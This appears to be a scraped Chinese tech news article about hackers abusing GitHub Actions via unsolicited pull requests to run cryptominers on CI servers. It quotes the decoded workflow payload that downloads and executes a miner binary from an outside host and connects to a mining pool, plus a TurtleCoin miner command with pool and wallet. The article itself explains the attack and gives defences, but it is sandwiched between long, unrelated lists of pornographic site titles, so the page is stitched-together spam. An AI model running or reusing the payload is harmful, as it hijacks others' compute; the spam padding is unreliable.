色综合中文综合网_性猛交娇小69hd_久久精品99久久久久久_欧美日韩精品一区二区三区四区 _97视频色精品_国产高清精品久久久久_日日鲁鲁鲁夜夜爽爽狠狠视频97 _国产成人免费视频精品含羞草妖精 _熟女少妇在线视频播放_精品人妻一区二区三区麻豆91 _久久女同性恋中文字幕_一区二区福利视频

黑客用GitHub服務器挖礦,三天跑了3萬個任務,代碼驚現中文

這種騷操作黑客也真想得出來

夢晨 曉查 發自 凹非寺
量子位 報道 | 公眾號 QbitAI

加密貨幣價格一路高漲,顯卡又買不起,怎么才能“廉價”挖礦?

黑客們動起了歪心思——“白嫖”服務器。

給PC植入挖礦木馬,已經無法滿足黑客日益增長的算力需求,如果能用上GitHub的服務器,還不花錢,那當然是極好的。

黑客用GitHub服務器挖礦,三天跑了3萬個任務,代碼驚現中文

而且整個過程可能比侵入PC還容易,甚至都不需要程序員上當受騙。只需提交Pull Request(PR),即使項目管理者沒有批準,惡意挖礦代碼依然能夠執行。

原理也很簡單,利用GitHub Action的自動執行工作流功能,輕松將挖礦程序運行在GitHub的服務器上。

早在去年11月,就已經有人發現黑客這種行為。更可怕的是,半年過去了,這種現象依然沒得到有效制止。

GitHub心里苦啊,雖然可以封禁違規賬號,但黑客們玩起了“游擊戰術”,不斷更換馬甲號逃避“追捕”,讓官方疲于奔命。

就在幾天前,一位荷蘭的程序員還發現,這種攻擊方式依然存在,甚至代碼里還出現了中文。

黑客用GitHub服務器挖礦,三天跑了3萬個任務,代碼驚現中文

那么,這些黑客是如何植入挖礦程序的呢?一切要從發現異常的法國程序員Tib說起。

PR異常讓程序員起疑心

去年11月,Tib發現,自己在一個沒有參加的repo上收到了PR請求。而且在14個小時內就收到了7個,全是來自一個“y4ndexhater1”的用戶,沒有任何描述內容。

黑客用GitHub服務器挖礦,三天跑了3萬個任務,代碼驚現中文

令人感到奇怪的是,這并不是一個熱門項目,Star數量為0。

黑客用GitHub服務器挖礦,三天跑了3萬個任務,代碼驚現中文

打開項目主頁發現,內容是Perl項目的github action、circle ci、travis-ci示例代碼集合,整個README文檔一團糟,根本不像一個正經的開源項目。

黑客用GitHub服務器挖礦,三天跑了3萬個任務,代碼驚現中文

然而就是這個混亂又冷門的repo,居然在3天里被fork了2次。

一切都太不正常了,讓人嗅到了一絲不安的氣息。

嘗試“作死”運行

本著“作死”的精神,Tib決定一探究竟。

經過那位可疑用戶的操作,Tib所有的action都被刪除,在工作流里被加入了一個ci.yml文件,內容如下:

黑客用GitHub服務器挖礦,三天跑了3萬個任務,代碼驚現中文

當Tib看到eval “$(echo “YXB0IHVwZGF0ZSAt這一行內容后,立刻從沙發上跳了起來,他意識到事情的嚴重性:有人在入侵他的GitHub個人資料!

這串看似神秘的字符,其實是base64編碼,經過翻譯后,得到了另一段代碼:

apt update -qq
apt install -y curl git jq
curl -Lfo prog https://github.com/bhriscarnatt/first-repo/releases/download/a/prog || curl -Lfo prog https://transfer.sh/OSPjK/prog
ip=$(curl -s -H?‘accept: application/dns-json’?‘https://dns.google/resolve?name=poolio.magratmail.xyz&type=A’?| jq -r?‘.Answer[0].data’)
chmod u+x prog
timeout 4h ./prog -o?“${ip}:3000” -u ChrisBarnatt -p ExplainingComputers –cpu-priority 5 > /dev/null

前面兩行不必解釋,有意思的地方從第三行開始,它會下載一個prog二進制文件。

為了安全起見,Tib先嘗試獲取信息而不是執行,得到了它的十六進制代碼。

$ objdump -s –section .comment prog
prog: file format elf64-x86-64
Contents of section .comment:
0000 4743433a 2028416c 70696e65 2031302e GCC: (Alpine 10.
0010 322e315f 70726531 29203130 2e322e31 2.1_pre1) 10.2.1
0020 20323032 30313230 3300 20201203.

Tib也考慮過反編譯,但是沒有成功。

不入虎穴,焉得虎子,Tib決定嘗試運行一下。

要執行這一大膽而又作死的任務,防止“試試就逝世”,Tib首先斷開了電腦的網絡鏈接,并選擇在Docker容器中運行。

答案終于揭曉,原來這個prog是一個名為XMRig的挖礦程序。

$ ./prog –version
XMRig 6.8.1
built on Feb 3 2021 with GCC 10.2.1
features: 64-bit AES
libuv/1.40.0
OpenSSL/1.1.1i
hwloc/2.4.0

當時XMRig的最新版恰好是6.8.1,和上面的版本參數符合。不過用SHA256檢測后發現,這個prog并不完全是XMRig,Tib預測它可能是一個修改版。

實際上,可能被攻擊的不止GitHub,安全公司Aqua推測,像Docker Hub、Travis CI、Circle CI這些SaaS軟件開發環境,都可能遭受這類攻擊。

在這個攻擊過程中,會派生一個合法的repo,負責將惡意的GitHub Action添加到原始代碼。然后,黑客再向原始repo提交一個PR,將代碼合并回原始repo。

下載的挖礦程序會偽裝成prog或者gcc編譯器,通過提交PR在項目執行自動化工作流。此時服務器將運行偽裝后的挖礦程序。

黑客用GitHub服務器挖礦,三天跑了3萬個任務,代碼驚現中文

這些攻擊者僅一次攻擊就可以運行多達100個挖礦程序,從而給GitHub的服務器帶來了巨大的計算量。

據Aqua估計,僅在三天的時間里,挖礦黑客就在GitHub上有超過2.33萬次commit、在Docker Hub上5.8萬次build,轉化了大約3萬個挖礦任務。

可以防范但很難根除

這種攻擊甚至不需要被攻擊的倉庫管理者接受惡意Pull Request。

只要在.github/workflows目錄里面的任意.yml文件中配置了在收到Pull Request時執行,來自黑客的Action就會自動被執行

如果你沒有使用這個功能,那就不用擔心啦,黑客大概也不會找上你。

需要用到這個功能的話,可以設置成只允許本地Action或只允許Github官方及特定作者創建的Action。

黑客用GitHub服務器挖礦,三天跑了3萬個任務,代碼驚現中文

將情況反饋給客服后,GitHub會對惡意賬號進行封號和關閉相關Pull Request的操作。

但惡意攻擊很難被根除,黑客只需要注冊新的賬號就可以繼續白嫖服務器資源。

攻擊還在繼續

我們從最近一次攻擊中發現,黑客將挖礦程序上傳到GitLab并偽裝成包管理工具npm。

黑客用GitHub服務器挖礦,三天跑了3萬個任務,代碼驚現中文

打開這個可疑的nani.bat,可以看到:

npm.exe –algorithm argon2id_chukwa2
–pool turtlecoin.herominers.com:10380
–wallet TRTLv3ZvhUDDzXp9RGSVKXcMvrPyV5yCpHxkDN2JRErv43xyNe5bHBaFHUogYVc58H1Td7vodta2fa43Au59Bp9qMNVrfaNwjWP
–password xo

這一次黑客挖的是烏龜幣*(TurtleCoin)*,可使用CPU計算。按當前價格挖出四千多個幣才值1美元。

黑客用GitHub服務器挖礦,三天跑了3萬個任務,代碼驚現中文

Github Actions的免費服務器可以提供英特爾E5 2673v4的兩個核心,7GB內存。

大致估算單臺運行一天只能獲利幾美分,而且黑客的挖礦程序通常只能在被發現之前運行幾個小時。比如Docker Hub就把自動build的運行時間限制在2個小時。

不過蚊子再小也是肉,黑客通過尋找更多接受公開Action的倉庫以及反復打開關閉Pull Request就能執行更多的挖礦程序。

黑客用GitHub服務器挖礦,三天跑了3萬個任務,代碼驚現中文

△同一黑客賬號至少攻擊了95個GitHub倉庫

正如Twitter用戶Dave Walker所說的,如果你提供免費的計算資源,就要做好會被攻擊和濫用的覺悟。挖礦有利可圖的情況下這是不可避免的。

黑客用GitHub服務器挖礦,三天跑了3萬個任務,代碼驚現中文

據報道,受害的不止GitHub,還有Docker Hub、Travis CI以及Circle CI等提供類似服務的持續集成平臺。

這一亂象不知何時才能結束,唯一的好消息可能就是,挖礦的黑客似乎只是針對GitHub提供的服務器資源,而不會破壞你的代碼。

但是GitHub Action的漏洞不止這一個。還有方法能使黑客讀寫開發者的倉庫,甚至可以讀取加密的機密文件。

黑客用GitHub服務器挖礦,三天跑了3萬個任務,代碼驚現中文

去年7月,Google Project Zero團隊就已向GitHub通報漏洞。但在給出的90天修復期限+延長14天后,GitHub仍未能有效解決。

對此,我們的建議是,不要輕易相信GitHub市場里的Action作者,不要交出你的密匙。

參考鏈接:
[1]https://therecord.media/github-investigating-crypto-mining-campaign-abusing-its-server-infrastructure/
[2]https://dev.to/thibaultduponchelle/the-github-action-mining-attack-through-pull-request-2lmc
[3]https://blog.aquasec.com/container-security-alert-campaign-abusing-github-dockerhub-travis-ci-circle-ci
[4]https://twitter.com/JustinPerdok
[5]https://bugs.chromium.org/p/project-zero/issues/detail?id=2070

版權所有,未經授權不得以任何形式轉載及使用,違者必究。
国产精品视频第一区| 天堂中文字幕av| 日本国产欧美一区二区三区| 麻豆久久一区二区| 天堂在线视频网站| 免费黄色在线网址| 日韩av在线综合| 欧美精品福利在线| 亚洲在线成人精品| 无码精品一区二区三区在线播放| 亚洲精品91美女久久久久久久| 国产麻豆视频一区二区| 一区二区三区在线观看免费视频| 96久久精品| 精品国产乱码久久久久久夜甘婷婷| 久久国产精品99精品国产| 黑人巨大精品一区二区在线| 99久久99| 久久精品国产精品亚洲红杏| 99精品1区2区| 亚洲自拍偷拍一区二区| 神马一区二区影院| 日韩一区二区三区在线播放| 亚洲欧美视频在线观看| 国产人妖一区二区| 好吊视频在线观看| 久久国产精品网| 国产精品久久久久久久一区探花 | 成人黄页在线观看| www.av88| 成人黄色短视频| 中文字幕在线观看第三页| 国产精国产精品| 精品爽片免费看久久| 亚洲美腿欧美偷拍| av日韩在线网站| 国产不卡一区二区视频| 精品视频高清无人区区二区三区| 欧美成人免费全部| 日韩精品在线播放| 欧美日韩国产在线播放网站| 综合久久国产九一剧情麻豆| 精品一区二区在线观看| 蜜臀精品一区二区三区| 日韩成人免费观看| 国产大片中文字幕| 一区二区在线观看免费视频| 朝桐光av一区二区三区| 天堂av在线网站| 日韩国产小视频| 三年中国中文在线观看免费播放| 久久大片网站| 国产在线精品一区| 亚洲自拍偷拍视频| 国产激情综合五月久久| 97国产精品视频| www.精品av.com| 俺也去精品视频在线观看| 国产亚洲欧美aaaa| 亚洲国产精品久久久久秋霞蜜臀| 欧美色综合天天久久综合精品| 精品av在线播放| 欧美日韩中文字幕综合视频| 午夜精品久久久久影视| 亚洲国产成人tv| 午夜国产精品一区| 日本电影亚洲天堂一区| 在线日韩国产精品| 日韩三级视频在线观看| 亚洲国产一区自拍| 久久精品成人欧美大片古装| 久久精品久久久久久国产 免费| 国产一区二区三区视频在线观看| 日韩午夜精品视频| 在线观看日韩欧美| 最新国产精品拍自在线播放 | 久久久久国产精品区片区无码| 日本国产在线视频| 激情无码人妻又粗又大| 51精品免费网站| 国产情侣激情自拍| 亚洲免费国产视频| 成人av午夜影院| 亚洲综合激情另类小说区| 欧美日韩卡一卡二| 欧美人在线视频| 国产精品一 二 三| 日本一道在线观看| 亚洲在线观看网站| 久久免费视频99| 亚洲娇小娇小娇小| 国产精品成人在线视频| 国产一级做a爱片久久毛片a| 久久久久国产精品一区二区| 久久精品无码一区二区三区| 精品视频999| 51精品国产黑色丝袜高跟鞋| 国产经典一区二区三区 | 久久久久免费| 亚洲在线免费播放| 亚洲福利影片在线| 超碰97在线人人| 中文字幕亚洲影院| 成人精品免费在线观看| 国产精品99久| 亚洲一区中文在线| 欧美激情精品久久久久久| 亚洲一区二区在线| 成人免费在线观看视频网站| 99成人在线观看| 国产91露脸合集magnet| 欧美日韩免费视频| 亚洲专区在线视频| 亚洲妇女无套内射精| 亚洲综合免费视频| 亚洲一区电影777| 5566日本婷婷色中文字幕97| 日韩欧美三级一区二区| 国产精品视频一区二区三| 亚洲专区区免费| 国内精品伊人久久久久av一坑 | 亚洲日本欧美中文幕| 亚洲欧洲在线一区| 国产欧美小视频| 中文欧美字幕免费| 在线一区二区日韩| 国产一级片黄色| www.激情五月| 日韩精品一区二区三区中文不卡| 久久精品国产综合精品| 黄色一级视频免费观看| 国内外成人在线视频| 亚洲精品视频久久| 成人小视频在线看| 日韩成人午夜精品| 亚洲男人天堂网站| 久久国产成人精品国产成人亚洲| 日本精品一区二区在线观看| 色视频成人在线观看免| 日韩精品资源| 一级黄色短视频| 日韩午夜在线影院| 一区二区在线观看网站| 一级片一区二区三区| 色欧美乱欧美15图片| 久久精品aaaaaa毛片| 中文字幕一区二区人妻| 欧美丰满少妇xxxxx高潮对白| 2021狠狠干| 六月丁香综合在线视频| 日韩美女免费线视频| 丰满圆润老女人hd| 亚洲国产精品一区二区尤物区| 国产精品免费一区二区| 伊人色综合久久久| 一本色道久久88综合日韩精品 | 国产欧美小视频| 在线观看一区二区精品视频| 日韩欧美在线观看强乱免费| 国产精品无码免费播放 | 国产欧美亚洲日本| 亚洲国产精品视频在线| 免费99精品国产自在在线| 国产三级自拍视频| 九九久久综合网站| 变态另类ts人妖一区二区| 亚洲综合偷拍欧美一区色| www.亚洲男人天堂| 内射一区二区三区| 日韩一区二区电影| 扒开伸进免费视频| 精品国产成人在线| 午夜在线观看av| 亚洲靠逼com| 农民人伦一区二区三区| 最新高清无码专区| 欧美精品第三页| 久久久久久一级片| 中文字幕色呦呦| 亚洲欧美日韩中文播放| 爱爱爱爱免费视频| 欧美中文字幕不卡| 亚洲一区二区三区观看| 亚洲福中文字幕伊人影院| 99精品视频国产| 欧美小视频在线观看| 黄页网站在线看| 91成品人影院| 91在线免费网站| 成人黄色网址在线观看| 日韩视频在线观看视频| 91日韩在线专区| 在线观看日韩片| 又紧又大又爽精品一区二区| 国产精九九网站漫画| 制服丝袜中文字幕一区| 成人国产精品久久久网站| 欧美日本在线观看| 精品少妇爆乳无码av无码专区| 国产91九色视频| 国产一区在线视频| 成年人午夜视频在线观看| 欧美电影一区二区三区| av首页在线观看| 成人h猎奇视频网站| www亚洲一区| 欧美 日本 国产| 国内精品美女av在线播放| 国产乱人乱偷精品视频a人人澡| 久久久久国产精品视频| 欧美日韩国内自拍| 男人av资源站| 欧美综合在线第二页| 国产日产亚洲精品系列| 成人黄色a级片| 91成人在线播放| 国产精品色哟哟网站| 日韩视频在线观看一区二区三区| 日韩电影免费在线观看中文字幕| 日本特黄特色aaa大片免费| 蜜桃视频在线观看成人| 欧美精品日日鲁夜夜添| 日韩性xxxx| 精品人妻大屁股白浆无码| 国产视频精品久久久| 麻豆精品新av中文字幕| 91成年人网站| 国产91色在线播放| 久久久久久电影| 久久久www成人免费毛片| 宅男一区二区三区| 亚洲美女自拍视频| 日本va欧美va精品| 特种兵之深入敌后| 成人18视频| 色天天综合色天天久久| 在线免费看av片| 青娱乐国产精品视频| 97在线视频免费播放| 亚洲国产精品久久艾草纯爱| 日本a级c片免费看三区| 粉嫩虎白女毛片人体| 国产精品私拍pans大尺度在线| 欧美在线999| 成人听书哪个软件好| 国产精品久久久久久久久久久久久久久久久| 91手机视频在线| 最新中文字幕亚洲| 亚洲美女精品一区| 波多野结衣一二区| 伊人免费视频二| 国产精品18毛片一区二区| 亚洲国产黄色片| 中文字幕视频一区二区三区久| 亚洲黄色精品视频| 色婷婷在线视频观看| 亚洲色图 在线视频| 欧美精品久久| 欧美精品videos另类日本| 免费观看一级视频| 1024精品视频| 91免费在线视频网站| 日韩三级中文字幕| 亚洲国产成人tv| 国产婷婷色一区二区三区四区| 国产 日韩 欧美 综合| 久久老司机精品视频| 欧美日韩国产精品激情在线播放| 欧美日韩在线观看一区二区三区| 日韩中文理论片| 日韩av在线网| 色菇凉天天综合网| 国产精品一区二区三区99| 精品国产乱码久久久久久虫虫漫画| 制服 丝袜 综合 日韩 欧美| 日韩偷拍一区二区| 亚洲一区制服诱惑| 青青影院一区二区三区四区| 国产精品国产精品| 国产精品第3页| 97se在线视频| 免费的av在线| 国产肉体xxxx裸体784大胆| 4438x全国最大成人| 激情五月六月婷婷| 免费观看国产视频在线| 蜜桃日韩视频| 亚洲自拍小视频| 欧美重口乱码一区二区| 国产精品免费小视频| 国产精品视频导航| 777777777亚洲妇女| 欧美老女人xx| 国产婷婷97碰碰久久人人蜜臀| 色哦色哦哦色天天综合| 亚洲免费成人av| 91亚洲精品久久久蜜桃| 久久精品国产99久久6 | 亚洲精品无人区| 国产精品久久久久久久天堂第1集| 美日韩在线视频| 久久青草福利网站| 日日狠狠久久偷偷四色综合免费 | 7777免费精品视频| 国产成人高潮免费观看精品| 高清视频欧美一级| 5566日本婷婷色中文字幕97| 欧美成人官网二区| 午夜精品一区二区三区免费视频 | 午夜激情视频在线播放| 三级男人添奶爽爽爽视频| 国产av人人夜夜澡人人爽| 手机成人av在线| 青青在线免费视频| 97人人模人人爽人人澡| 特级黄色片视频| 国产欧美精品一二三| 丰满圆润老女人hd| 久久久久久久中文字幕| 九九免费精品视频| 精品国产无码AV| 国产成人啪免费观看软件| 欧美激情资源网| 91精品国产乱| 国产一区二区三区中文| 91亚洲精品久久久| av无码精品一区二区三区| 亚洲一级黄色录像| 99国产在线播放| 成人激情文学综合网| 91精品国产品国语在线不卡| 久久久噜噜噜久久| 成人免费视频观看视频| 日本三级中文字幕在线观看| 4438x全国最大成人| 99热这里只有精品4| 国产精品一区二区黑丝| 亚洲成年人网站在线观看| xxxxx成人.com| 国产精品久久久久7777| 中文字幕一区二区三区手机版 | 亚洲黄色免费观看| 毛片av中文字幕一区二区| 精品人伦一区二区三区蜜桃免费| 91精品国产91久久久久久久久 | 亚洲成人午夜在线| 朝桐光av在线| 99精品热视频| 精品国产一区久久久| 日韩欧美亚洲区| 超碰人人干人人| 99久久免费精品高清特色大片| 亚洲经典中文字幕| 懂色一区二区三区av片| 白白色免费视频| 麻豆成人综合网| 亚洲电影免费观看高清完整版在线观看 | 成人黄色网址在线观看| 亚洲性生活视频| 青青青在线播放| 蜜桃视频污在线观看| 亚洲高清福利视频| 久久波多野结衣| 国产精品日日夜夜| 一区二区三区四区蜜桃| 国产一区二区中文字幕免费看| 精品人妻在线播放| 色综合天天视频在线观看| 国产盗摄xxxx视频xxx69| 性色av蜜臀av色欲av| 国产精品久久一卡二卡| 国产主播欧美精品| 国产亚洲欧美精品久久久www| 福利微拍一区二区| 亚洲一区二区三区久久| 天堂久久精品忘忧草| 国产精品一区二区不卡| 57pao国产成人免费| 国产免费a级片| 亚洲一区二区视频| 国产乱码一区| 日韩精品成人在线| 欧美成人性战久久| 99亚洲精品视频| 网站黄在线观看| 日本国产精品视频| 中文字幕伦理片| 亚洲蜜臀av乱码久久精品 | 波多野结衣电影在线播放| 欧美一区二区三区婷婷月色| 致1999电视剧免费观看策驰影院| 老司机精品视频网站| 韩国v欧美v日本v亚洲| 九九热在线免费观看| 欧美大肚乱孕交hd孕妇| 91国内在线播放| 一区在线中文字幕| 日韩亚洲不卡在线| 性欧美一区二区三区| 91精品国产自产91精品| 中文字幕永久在线| 亚洲精品成a人在线观看| 99久久久无码国产精品不卡| 精品国产一区二区在线观看| 强伦人妻一区二区三区| 色婷婷综合久久久中文一区二区| 国产成人美女视频| 洋洋av久久久久久久一区| 在线观看国产一区| 日韩黄色在线观看|